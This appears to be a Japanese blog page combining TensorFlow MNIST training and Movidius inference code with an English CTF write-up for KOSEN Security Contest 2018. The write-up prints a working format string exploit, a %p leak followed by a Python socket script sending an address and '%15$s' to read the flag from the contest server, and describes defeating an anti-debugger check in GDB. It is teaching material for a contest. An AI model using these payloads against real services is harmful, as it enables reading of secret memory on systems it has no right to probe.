from tensorflow.examples.tutorials.mnist import input_data import tensorflow as tf import tempfile def deepnn(x): with tf.name_scope('reshape'): x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x with tf.name_scope('conv1'): W_conv1 = weight_variable([5, 5, 1, 32]) b_conv1 = bias_variable([32]) h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1) with tf.name_scope('pool1'): h_pool1 = max_pool_2x2(h_conv1) with tf.name_scope('conv2'): W_conv2 = weight_variable([5, 5, 32, 64]) b_conv2= bias_variable([64]) h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) with tf.name_scope('pool1'): h_pool2 = max_pool_2x2(h_conv2) with tf.name_scope('fc1'): W_fc1 = weight_variable([7 * 7 * 64, 1024]) b_fc1 = bias_variable([1024]) h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64]) h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) with tf.name_scope('dropout'): keep_prob = tf.placeholder(tf.float32) h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) with tf.name_scope('fc2'): W_fc2 = weight_variable([1024, 10]) b_fc2 = bias_variable([10]) y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2 return y_conv, keep_prob def conv2d(x, W): return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME') def max_pool_2x2(x): return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') def weight_variable(shape): initial = tf.truncated_normal(shape, stddev=0.1) # random return tf.Variable(initial) def bias_variable(shape): initial = tf.constant(0.1, shape=shape) # all 0.1 return tf.Variable(initial) def main(): mnist = input_data.read_data_sets('MNIST_data', one_hot=True) x = tf.placeholder(tf.float32, [None, 784], name='input') y_ = tf.placeholder(tf.float32, [None, 10]) y_conv, keep_prob = deepnn(x) with tf.name_scope('loss'): cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv) cross_entropy = tf.reduce_mean(cross_entropy) with tf.name_scope('adam_optimizer'): train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy) with tf.name_scope('accuracy'): correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1)) correct_prediction = tf.cast(correct_prediction, tf.float32) accuracy = tf.reduce_mean(correct_prediction) graph_location = tempfile.mkdtemp() print('saving graph to: %s' % graph_location) train_writer = tf.summary.FileWriter(graph_location) train_writer.add_graph(tf.get_default_graph()) saver = tf.train.Saver() with tf.Session() as sess: sess.run(tf.global_variables_initializer()) for i in range(500): batch = mnist.train.next_batch(50) if i % 10 == 0: train_accuracy = accuracy.eval(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0}) print('step %d, training accuracy %g' % (i, train_accuracy)) train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5}) print('test accuracy %g' % accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})) graph_location = "." save_path = saver.save(sess, graph_location + "/mnist_model") main()
モデル変換用
from tensorflow.examples.tutorials.mnist import input_data import tensorflow as tf import tempfile def deepnn(x): with tf.name_scope('reshape'): x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x with tf.name_scope('conv1'): W_conv1 = weight_variable([5, 5, 1, 32]) b_conv1 = bias_variable([32]) h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1) with tf.name_scope('pool1'): h_pool1 = max_pool_2x2(h_conv1) with tf.name_scope('conv2'): W_conv2 = weight_variable([5, 5, 32, 64]) b_conv2= bias_variable([64]) h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) with tf.name_scope('pool1'): h_pool2 = max_pool_2x2(h_conv2) with tf.name_scope('fc1'): W_fc1 = weight_variable([7 * 7 * 64, 1024]) b_fc1 = bias_variable([1024]) h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64]) h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) with tf.name_scope('fc2'): W_fc2 = weight_variable([1024, 10]) b_fc2 = bias_variable([10]) y_conv = tf.matmul(h_fc1, W_fc2) + b_fc2 return y_conv def conv2d(x, W): return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME') def max_pool_2x2(x): return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') def weight_variable(shape): initial = tf.truncated_normal(shape, stddev=0.1) # random return tf.Variable(initial) def bias_variable(shape): initial = tf.constant(0.1, shape=shape) # all 0.1 return tf.Variable(initial) def main(): x = tf.placeholder(tf.float32, [None, 784], name='input') y_conv = deepnn(x) output = tf.nn.softmax(y_conv, name='output') saver = tf.train.Saver() with tf.Session() as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) saver.restore(sess, '.' + '/output/mnist_model') saver.save(sess, '.' + '/output/mnist_inference') main()
コンパイル
mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
もしinputとoutputのノードの名前がinputとoutpuであれば、-inと-onいらないかもしれない。
Movidiusでの推論
import mvnc.mvncapi as mvnc import numpy as np from PIL import Image import cv2 import time, sys, os import glob IMAGE_DIR_NAME = './JPEGImages/pickup/' #IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images' def predict(input): print("Start prediting ...") devices = mvnc.EnumerateDevices() device = mvnc.Device(devices[0]) device.OpenDevice() # Load graph file data with open('./output/mnist_inference.graph', 'rb') as f: graph_file_buffer = f.read() # Initialize a Graph object graph = device.AllocateGraph(graph_file_buffer) start = time.time() for i in range(len(input)): # Write the tensor to the input_fifo and queue an inference graph.LoadTensor(input[i], None) output, userobj = graph.GetResult() print(np.argmax(output), end=' ') stop = time.time() print('') print("Time : {0} ({1} images)".format(stop-start, len(input))) graph.DeallocateGraph() device.CloseDevice() return output if __name__ == '__main__': print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg'))) jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg')) if not len(jpg_list): print("No image file") sys.exit() jpg_list.reverse() print([i.split('/')[-1] for i in jpg_list]) img_list = [] for n in jpg_list: image = cv2.imread(n) image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) image = cv2.bitwise_not(image) iamge = cv2.resize(image, (28, 28)) img_list.append(image) img_list = np.asarray(img_list)[:10] * (1.0/255.0) print("imgshape ", img_list.shape) predict(img_list.astype(np.float16))
KOSEN Security Contest 2018 Write-Up
CTFを始めた友人のために英語でWrite-Upを書いてみます.英語は得意ではないのでいろいろとご了承くださいませ.
KOSEN Security Contest 2018 was held from September 1st to 2nd. It's a CTF for Kosen students.
I enter the contest with my Laboratory member and my juniors. Our team name is 074m4K053n and the team was 3rd position. (3rd / 36teams)
I solved following questions.
- [Sample] 100 Sample
- [Binary] 100 printf
- [Binary] 200 XOR, XOR
- [Binary] 250 Simple anti debugger
- [Network] 150 Login and Get flag
- [Web] 100 Steal a information from Server
- [Web] 300 Steal a account
- [Misc] 50 I don't wanna see HITO OOSUGI
- [Misc] 100 No disc space
And I'll explain about these questions.
00 [Sample] 100 Sample
[Question]
CTF is a competition which find answers called "flag".
The flag shape is SCKOSEN{foobar}.
In order to practice, submit current japanese era as flag.
example :
SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}
MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}
TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}
[Solution]
This is sample question.
Current japanese era is Heisei (1989 - 2019).
So, flag is SCKOSEN{HEISEI}.
03 [Binary] 100 printf
[Question]
Steal a flag !
How to connect to game : nc [foobar] [port] example: nc 27.133.152.42 80
[Solution]
Use sample command then get following strings.
$ nc 27.133.152.42 80
Secret is in 0xffc9a37e
What do you want:
Type "Earth" then get following strings.
$ nc 27.133.152.42 80
the secret is in 0xffc9a37e
what do you want: Earth
there is no Earth
Type "AAAA,%p,%p,%p,%p,%p,%p" and get
the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025
As you can see from the result, we could leak few value in the memory by using %p. So, we can use Format String Attack.
Let's see the result again
AAAA,
0x100,
0xf7ed65c0,
(nil),
(nil),
(nil),
(nil),
0x43530000,
0x45534f4b,
0x73757b4e,
0x72705f65,
0x66746e69,
0x726f635f,
0x74636572,
0x7d796c,
0x41414141,
We can find 0x41414141 (It's "AAAA" wiritten in ascii) at 15th position. The 0x41414141 is a string which I send.
So, if we send a address instead of "AAAA", we can read value from the address.
Attack string :
{secret address}, %15$s
We can get {secret address} from "the secret is in 0xff985c6e"
And python script is here :
#!/usr/bin/env python2
import socketimport struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect*1res = s.recv(4096)res += s.recv(4096)print(res)addr = int(res.split()[4],16)#buf = "AAAA"buf = struct.pack("<I", addr)#buf += ',%p' * 20buf += ',%15$s'buf += '\n's.send(buf)print(buf)res = s.recv(4096)res += s.recv(4096)res += s.recv(4096)print(res)s.close()
And result is here :
the secret is in 0xffc0b52e
what do you want:
.���,%15$sthere is no .���,SCKOSEN{use_printf_correctly}
04 [Binary] 200 XOR, XOR
[Question]
Read assembly and get flag !
[Solution]
There is a file the name is "asmreading".
First, check the file by using file command
$ file ./asmreading
asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped
It's ELF fexecutable file.
Next, use GDB debugger, and disassemble main function.
We can see the ASCII codes and xor_func. So, xor_func seems to be decode function.
To check that, set break point after call xor_func and run the executable file.
And then, we can find a decoded flag.
Flag is SCKOSEN{you_can_read_assembly}. (But I didn't read assembly ...)
05 [Binary] 250 Simple anti debugger
[Question]
I attached it from GDB, but it doesn't work.
How can I analyse it ?
[Solution]
There is a file the name is "simple_anti_debugger".
First, check the file by using file command
$ file ./simple_anti_debugger
asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped
It's ELF fexecutable file.
Next, use GDB debugger. But I couldn't execute binary with debugger because of unti debug technique.
So first, see the function information. There is detect_debugger function. Let's try to avoid it.
In detect_debugger function, eax register is compared with 0xffffff. If eax is 0xffffff, program will go to exit code.
To avoid it, I change the value in eax.
And now, we can use debugger in main function.
Change eax again to avoid password check.
And then, we can get flag. Flag is SCKOSEN{I_like_debugger}.
I'll write other question later.....
*1: '27.133.152.42', 80